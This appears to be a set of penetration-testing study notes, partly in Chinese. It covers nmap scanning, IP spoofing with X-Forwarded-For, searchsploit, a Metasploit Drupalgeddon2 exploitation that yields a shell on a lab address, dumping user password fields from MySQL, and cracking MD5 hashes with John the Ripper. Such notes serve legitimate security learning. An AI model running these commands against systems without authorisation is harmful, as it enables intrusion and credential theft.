Web Security

flow

How web work

Web Application

---

nmap

nmap介绍

端口介绍

# 扫描网段
nmap -sn 192.168.80.0/24 -oG -

# 检测服务版本
nmap -sV 192.168.80.22

# 扫描全端口
nmao -sS -p- 192.168.80.22

---

burpsuit

burpsuit

伪造客户端IP地址

request header

X-Forwarded-For: 127.0.0.1

---

exploit

Exploit-db

exploit-db, Kali linux 官方团队维护的一个安全项目，是公认的世界上最大的搜集漏洞的数据库。

searchsploit

# 搜索
searchsploit drupal

# 查看路径 path
searchsploit -p 34992.py

# 拷贝到本地
searchsploit -m 34992.py

# 更新本地漏洞库
searchsploit -u

---

Metasploit

Metasploit Framework , 通常简称MSF。一个强大的漏洞利用和测试的综合平台，其中集成了大量的漏洞利用工具。在Kali中集成了MSF的社区版本。

MSF初始化

# 开启postgresql服务
systemctl start postgresql.service

# 对MSF的数据库进行初始化
msfdb init

使用

进入控制台

msfconsole

msf

msf > db_status
[*] Connected to msf. Connection type: postgresql.

msf > search drupal

msf > use 1

msf exploit(unix/webapp/drupal_drupalgeddon2) > show options

msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.80.128

msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit

meterpreter

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

---

database

databases

mysql -uusername -ppasswd

 mysql -h192.168.80.15 -uroot -ppasswd --skip-ssl

#查看版本
select version();

#查看当前用户
select user();

#查看当前打开的数据库
select database();

show databases;

use table_name;

show tables;

DESC users;
select name, pass from users;

sql inject

sql inject

---

brutepforce

bruteforce tools

字典去重排序

sort -u wordlist.dic > sortedwordlist.dic

John

John the Ripper

Cracking

john --format=raw-md5 --wordlist=/wordlists/hash-dic.txt hash-target.txt

查看结果

john --show --format=raw-md5 hash-target.txt

其它

hash-identifier

john --list=formats

---